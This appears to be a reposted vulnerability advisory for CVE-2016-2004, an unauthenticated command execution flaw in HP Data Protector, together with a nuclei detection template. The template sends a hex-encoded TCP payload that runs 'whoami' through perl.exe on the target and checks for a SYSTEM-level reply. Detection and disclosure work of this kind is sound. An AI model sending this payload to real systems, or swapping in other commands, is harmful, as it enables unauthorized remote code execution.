HP Data Protector Arbitrary Command Execution Vulnerability

Vulnerability Information

Vulnerability name: HP Data Protector Arbitrary Command Execution Vulnerability

Vulnerability ID:

  • CVE: CVE-2016-2004

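Vulnerability type: Command execution

Severity: Critical

Description: HP Data Protector is enterprise data backup and recovery software, widely used in organizations of all sizes to protect critical data from loss or corruption. It supports multiple operating systems and databases and is an important part of enterprise IT infrastructure. The vulnerability allows an attacker to execute arbitrary code via unspecified vectors and results from an incomplete fix for CVE-2014-2623. Specifically, the root cause is the lack of a proper authentication mechanism, which lets an attacker bypass security restrictions and send malicious commands directly to the service. Exploitation could let an attacker execute arbitrary commands with the privileges of the Data Protector service account, and in turn possibly take full control of the system, steal sensitive data, or disrupt service. Because the vulnerability can be exploited without user interaction and has a broad impact, it is rated critical. Organizations should upgrade to the latest version of HP Data Protector immediately to guard against potential attacks.

Vendor: HP

Product: Data Protector

Affected versions: before 7.03_108, 8.x before 8.15, and 9.x before 9.06

Source: https://github.com/projectdiscovery/nuclei-templates/blob/64a64b0937e369fef2cb769b4e48757616ecce15/network%2Fcves%2F2016%2FCVE-2016-2004.yaml

Type: projectdiscovery/nuclei-templates:github issues

POC Details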


id: CVE-2016-2004

info:
  name: HP Data Protector - Arbitrary Command Execution
  author: pussycat0x, NaN@korelogic
  severity: critical
  description: HPE Data Protector before 7.03_108, 8.x before 8.15, and 9.x before 9.06 allow remote attackers to execute arbitrary code via unspecified vectors related to lack of authentication. This vulnerability exists because of an incomplete fix for CVE-2014-2623.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands with the privileges of the Data Protector service account.
  remediation: |
    Upgrade to the most recent version of HP Data Protector.
  reference:
    - https://www.exploit-db.com/exploits/39858
    - https://nvd.nist.gov/vuln/detail/CVE-2016-2004
    - http://www.kb.cert.org/vuls/id/267328
    - https://www.exploit-db.com/exploits/39858/
    - http://packetstormsecurity.com/files/137199/HP-Data-Protector-A.09.00-Command-Execution.html
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2016-2004
    cwe-id: CWE-306
    epss-score: 0.92734
    epss-percentile: 0.99751
    cpe: cpe:2.3:a:hp:data_protector:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: hp
    product: data_protector
  tags: packetstorm,cve,cve2016,network,iot,hp,rce,edb,tcp

tcp:
  - host:
      - "{{Hostname}}"
      - "{{Host}}:{{Port}}"
    inputs:
      - data: "00000034320001010101010100010001000100010100203238005c7065726c2e65786500202d6573797374656d282777686f616d69272900" # whoami
        type: hex
    matchers:
      - type: word
        encoding: hex
        words:
          - "00000034fffe3900000020006e007400200061007500740068006f0072006900740079005c00730079007300740065006d000a0000000000" # authority\system
# digest: 490a0046304402205cb8d4fc530d3448a6fd8ee810f0c3ebf70d1061fecfe0c5b61fcdb60c0f055c02200ddf9aa8fc1921d76c065889e43a4401a29dd6de877e348916bcf601ecfef8bc:922c64590222798bb761d5b6d8e72950


HP Data Protector Arbitrary Command Execution Vulnerability
http://example.com/2025/07/06/github_922721740/
Author: lianccc
Published: July 6, 2025